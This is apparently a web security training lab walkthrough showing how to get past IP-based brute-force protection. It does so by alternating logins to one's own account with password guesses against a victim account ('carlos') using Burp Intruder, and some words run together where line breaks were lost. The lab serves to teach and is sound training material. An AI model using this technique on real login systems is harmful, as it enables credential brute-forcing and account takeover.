Lab: Broken brute-force protection, IP block
This lab is vulnerable due to a logic flaw in its password brute-force protection. To solve the lab, brute-force the victim's password, then log in and access their "My account" page.
Tip: Advanced users may want to solve this lab by using a macro or the Turbo Intruder extension. However, it is possible to solve the lab without using these advanced features.
- Candidate passwords
- With Burp running, investigate the login page. Observe that your IP is blocked if you submit 3 incorrect logins in a row. However, you can reset the counter by logging in to your own account before the limit is reached.
Enter an invalid username and password, then send the
POST /loginrequest to Burp Intruder. Create a pitchfork attack with payload positions in both the
On the "Payloads" tab, select payload set 1. Add a list of payloads that alternates between your username and
carlos. Make sure that your username is first and that
carlosis repeated at least 100 times.
- Edit the list of candidate passwords and add your own password before each one. Make sure that your password is aligned with your username in the other list.
- Add this list to payload set 2 and start the attack.
- When the attack finishes, sort the results by username and then response code. There will be a 302 response for the request that successfully logged in to Carlos's account.
Log in as
carlosand click "My account" to solve the lab.